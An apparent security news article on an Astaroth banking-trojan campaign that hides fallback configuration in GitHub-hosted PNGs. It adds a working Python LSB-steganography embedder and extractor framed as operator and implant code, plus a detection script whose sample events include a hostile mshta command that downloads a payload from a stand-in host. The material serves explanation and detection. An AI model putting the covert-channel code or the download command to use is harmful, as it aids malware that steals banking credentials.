Astaroth Malware Uses Steganography in GitHub Images for Covert C2 Backup
McAfee researchers have reported a renewed campaign by the banking trojan Astaroth, which has begun abusing GitHub as a resilient channel for delivering configuration data. By leveraging a legitimate platform in this way, attackers can retain control of compromised machines even after primary command-and-control servers are taken down, markedly increasing the malware’s survivability and complicating remediation efforts.
The intrusion chain begins with a phishing message masquerading as a notification from a familiar service such as DocuSign, or as an ostensibly legitimate résumé. The email links to a ZIP archive; inside is a Windows shortcut (.lnk) that launches hidden JavaScript through mshta.exe. That script fetches a second-stage payload from a remote host that geofences requests: the malicious bundle is served only to machines located in the attackers' target regions, so analysts outside those regions typically receive nothing.
The retrieved package includes an AutoIt script together with its interpreter, an encrypted payload body, and a separate configuration file. The script unpacks shellcode in memory and injects a DLL into RegSvc.exe, and it evades detection through anti-analysis techniques and API shimming that replaces calls into kernel32.dll. The deployed module, written in Delphi, performs exhaustive environment checks and aborts if it detects a sandbox, a debugger, or an English-language locale.
Astaroth continuously monitors the foreground window. When the user visits an online-banking or cryptocurrency site, the trojan activates a keylogger that captures keystrokes, triggering on window class names such as chrome, mozilla and ieframe. Its target lists include major Brazilian banks and a slew of crypto services, among them Binance, MetaMask, Etherscan and LocalBitcoins. Stolen credentials and data are relayed to the operators over a proprietary protocol or tunneled through reverse-proxy services such as ngrok.
A distinguishing feature of this campaign is Astaroth’s use of GitHub-hosted PNG images as a fallback configuration channel. Every two hours the trojan downloads a PNG from a public repository; the image conceals an encrypted configuration via steganography. McAfee found repositories following predictable naming schemes and coordinated their removal with platform administrators, but the technique exemplifies how legitimate infrastructure can be repurposed as a covert update mechanism for malware.
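To make the fallback channel concrete, here is an added example (not Astaroth's code, and not part of McAfee's report) that models both sides of it: an operator embeds an encrypted configuration in a PNG, and an implant that fetched the image recovers it. The report does not say which steganographic scheme the trojan uses, so least-significant-bit (LSB) embedding is an assumption, the repeating-key XOR stands in for whatever encryption is really applied, and the cover image, key and configuration string (with a documentation address, 198.51.100.7) are constructed. The PNG reader and writer are standard-library only and handle 8-bit RGB with filter type 0, which is all the demo needs.

```python
"""Model of a config-in-image fallback channel: LSB steganography in a PNG.

Added example; LSB embedding and repeating-key XOR are assumptions, not
Astaroth's actual scheme.  Pure standard library.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC-32 over type+data."""
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF))


def write_png(width: int, height: int, rgb: bytes) -> bytes:
    """Encode width*height*3 RGB bytes as a valid PNG (filter type 0 on every row)."""
    stride = width * 3
    raw = b"".join(b"\x00" + rgb[y * stride:(y + 1) * stride] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_png(data: bytes):
    """Parse a PNG back to (width, height, rgb), verifying every chunk CRC."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos + 12 <= len(data):
        length, = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        crc, = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError("CRC mismatch in %r chunk" % ctype)
        if ctype == b"IHDR":
            width, height, depth, colour = struct.unpack(">IIBB", body[:10])
            if (depth, colour) != (8, 2):
                raise ValueError("only 8-bit RGB is supported here")
        elif ctype == b"IDAT":
            idat += body
        elif ctype == b"IEND":
            break
        pos += 12 + length
    raw, stride, rows = zlib.decompress(idat), width * 3, []
    for y in range(height):
        row = raw[y * (stride + 1):(y + 1) * (stride + 1)]
        if row[0] != 0:
            raise ValueError("only filter type 0 is supported here")
        rows.append(row[1:])
    return width, height, b"".join(rows)


def embed_lsb(rgb: bytes, payload: bytes) -> bytes:
    """Hide a length-prefixed payload in the low bit of successive channel bytes."""
    msg = struct.pack(">I", len(payload)) + payload
    bits = [(b >> (7 - i)) & 1 for b in msg for i in range(8)]
    if len(bits) > len(rgb):
        raise ValueError("cover image too small for payload")
    out = bytearray(rgb)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def extract_lsb(rgb: bytes) -> bytes:
    """Recover the payload: read the 32-bit length, then that many bytes."""
    def read_bytes(offset_bits: int, n: int) -> bytes:
        out = bytearray()
        for k in range(n):
            byte = 0
            for i in range(8):
                byte = (byte << 1) | (rgb[offset_bits + k * 8 + i] & 1)
            out.append(byte)
        return bytes(out)
    length, = struct.unpack(">I", read_bytes(0, 4))
    if length > (len(rgb) - 32) // 8:
        raise ValueError("length field exceeds cover capacity; probably not a carrier")
    return read_bytes(32, length)


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Stand-in for the real, unspecified encryption: repeating-key XOR."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed cover image (a gradient), key and configuration; not real artefacts.
COVER_W, COVER_H = 64, 16
COVER = bytes((x * 4 + c * 40) & 0xFF for _ in range(COVER_H) for x in range(COVER_W) for c in range(3))
CONFIG = b"c2=198.51.100.7:443;poll=7200"
KEY = b"example-key"


def build_carrier() -> bytes:
    """Operator side: the PNG that would be committed to the public repository."""
    return write_png(COVER_W, COVER_H, embed_lsb(COVER, xor_stream(CONFIG, KEY)))


def recover_config(png: bytes) -> bytes:
    """Implant side: what runs on the fetched image every polling interval."""
    _, _, rgb = read_png(png)
    return xor_stream(extract_lsb(rgb), KEY)


if __name__ == "__main__":
    print(recover_config(build_carrier()))
```

The carrier is a fully valid PNG: every chunk has a correct CRC and any image viewer renders it, which is why a hosting platform's ordinary content checks see nothing wrong. Note that the implant's extraction only sanity-checks the length field; a defender reading the same bits out of an arbitrary image gets the same length check failing, which is a cheap first filter but not a detection.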
To establish persistence, the trojan drops a shortcut into the startup folder so it launches automatically with each system boot. Despite the technical sophistication of the attack chain, the initial infection vector remains social engineering — exploitation of user trust in email and attachments.
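The delivery chain described in the paragraphs above maps onto a handful of endpoint-telemetry rules. The following added example (not McAfee's detection content) triages constructed, Sysmon-like process-creation and file-creation records: it reconstructs the process tree from pid/ppid links and flags mshta.exe launched from the shell with an inline script, a script interpreter running from a user-writable path, RegSvc.exe appearing beneath an mshta.exe ancestor, and a shortcut written to the Startup folder. The field names, the interpreter name AutoIt3.exe, the paths and every event are assumptions or constructed data; RegSvc.exe is the injection target named in the report.

```python
"""Triage of endpoint events against the Astaroth delivery chain.

Added example with constructed telemetry; field names, pids, paths and the
AutoIt interpreter name (AutoIt3.exe) are assumptions.
"""
import re
from typing import Dict, List, Tuple

# Constructed, Sysmon-like records for one host.  Not real logs.
EVENTS: List[Dict] = [
    {"type": "process", "pid": 1000, "ppid": 800,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "pid": 2000, "ppid": 1000,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe javascript:w=new ActiveXObject('WScript.Shell');"
                "w.Run('curl.exe http://example.invalid/p -o p.zip',0);close()"},
    {"type": "process", "pid": 2100, "ppid": 2000,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe http://example.invalid/p -o p.zip"},
    {"type": "process", "pid": 2200, "ppid": 2000,
     "image": r"C:\Users\alice\AppData\Local\Temp\p\AutoIt3.exe",
     "cmdline": r"AutoIt3.exe C:\Users\alice\AppData\Local\Temp\p\s.a3x"},
    {"type": "process", "pid": 2300, "ppid": 2200,
     "image": r"C:\Windows\System32\RegSvc.exe", "cmdline": "RegSvc.exe"},
    {"type": "file", "pid": 2200,
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"type": "process", "pid": 3000, "ppid": 1000,
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):|https?://", re.I)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _user_writable(path: str) -> bool:
    """Crude test for locations a standard user can write to."""
    return re.search(r"\\(Users|ProgramData|Temp)\\", path, re.I) is not None


def ancestry(events: List[Dict], pid: int) -> List[str]:
    """Image basenames from the given process up to the root, following ppid links."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "process"}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_base(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def triage(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule name, event index) pairs for events matching the chain."""
    hits = []
    for i, ev in enumerate(events):
        if ev["type"] == "process":
            img, tree = _base(ev["image"]), ancestry(events, ev["pid"])
            # Shortcut double-clicked in the shell -> mshta.exe with inline script/URL.
            if img == "mshta.exe" and INLINE_SCRIPT.search(ev["cmdline"]) and tree[1:2] == ["explorer.exe"]:
                hits.append(("mshta_inline_script_from_shell", i))
            # Dropped script interpreter executing out of a user-writable directory.
            if img == "autoit3.exe" and _user_writable(ev["image"]):
                hits.append(("script_interpreter_user_path", i))
            # Injection target launched anywhere below the mshta.exe stage.
            if img == "regsvc.exe" and "mshta.exe" in tree[1:]:
                hits.append(("regsvc_under_mshta_tree", i))
        elif ev["type"] == "file" and STARTUP_LNK.search(ev.get("target", "")):
            hits.append(("startup_shortcut_written", i))
    return hits


if __name__ == "__main__":
    for rule, idx in triage(EVENTS):
        print(rule, EVENTS[idx])
```

The tree walk is what turns four weak signals into one strong one: mshta.exe under explorer.exe or a startup shortcut each occur in benign activity, but RegSvc.exe with mshta.exe among its ancestors and a user-path interpreter in between is the chain the report describes. Keep the path heuristics loose on purpose; the filenames here are constructed and the real dropper names will differ.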
McAfee stresses that campaigns of this kind underscore the urgency of stricter controls over content and artifacts on public code hosting services, since threat actors increasingly exploit such platforms to bypass conventional blocking mechanisms. The company has shared details of the malicious repositories with GitHub; those repositories were promptly removed, temporarily disrupting Astaroth’s update channel.